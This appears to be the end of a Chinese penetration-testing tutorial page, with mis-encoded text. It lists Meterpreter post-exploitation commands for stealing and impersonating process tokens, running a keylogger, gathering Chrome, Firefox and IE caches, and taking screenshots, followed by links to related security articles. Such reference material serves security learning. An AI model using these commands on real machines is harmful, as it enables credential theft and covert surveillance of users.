Webscan_chat //²é¿´ÉãÏñÍ·½Ó¿Ú£»
steal_token ÊÔͼÇÔȡָ¶¨£¨PID£©½ø³ÌµÄÁîÅÆ
use incognito //¼ÓÔØincoginto¹¦ÄÜ£¨ÓÃÀ´µÁÇÔÄ¿±êÖ÷»úµÄÁîÅÆ»òÊǼÙðÓû§)
list_tokens ¨Cu //ÁгöÄ¿±êÖ÷»úÓû§µÄ¿ÉÓÃÁîÅÆ
list_tokens ¨Cg //ÁгöÄ¿±êÖ÷»úÓû§×éµÄ¿ÉÓÃÁîÅÆ
keyscan_start //¿ªÆô¼üÅ̼Ǽ¹¦ÄÜ
keyscan_dump //ÏÔʾ²¶×½µ½µÄ¼üÅ̼ǼÐÅÏ¢
keyscan_stop //Í£Ö¹¼üÅ̼Ǽ¹¦ÄÜ
run post/windows/gather/enum_chrome //»ñÈ¡¹È¸è»º´æ
run post/windows/gather/enum_firefox //»ñÈ¡»ðºü»º´æ
run post/windows/gather/enum_ie //»ñÈ¡IE»º´æ
screenshot //½ØÆÁ
   
2252 ´Îä¯ÀÀ       29
 
Ïà¹ØÎÄÕÂ

iOSÓ¦Óð²È«¿ª·¢£¬Äã²»ÖªµÀµÄÄÇЩÊÂÊõ
Web°²È«Ö®SQL×¢Èë¹¥»÷
ÒÆ¶¯APP°²È«ÔÚÉøÍ¸²âÊÔÖеÄÓ¦ÓÃ
´ÓGoogle±¸·Ý»¥ÁªÍø¿´¡°Êý¾Ý°²È«¡±
 
Ïà¹ØÎĵµ

web°²È«Éè¼ÆÓë·À»¤
»¥ÁªÍøº£Á¿ÄÚÈݰ²È«´¦Àí¼¼Êõ
ºÚ¿Í¹¥»÷Óë·À·¶¼¼Êõ
WEBºÚºÐ°²È«¼ì²â
 
Ïà¹Ø¿Î³Ì

WEBÍøÕ¾ÓëÓ¦Óð²È«Ô­ÀíÓëʵ¼ù
webÓ¦Óð²È«¼Ü¹¹Éè¼Æ
´´½¨°²È«µÄJ2EE WebÓ¦ÓôúÂë
ÐÅÏ¢°²È«ÎÊÌâÓë·À·¶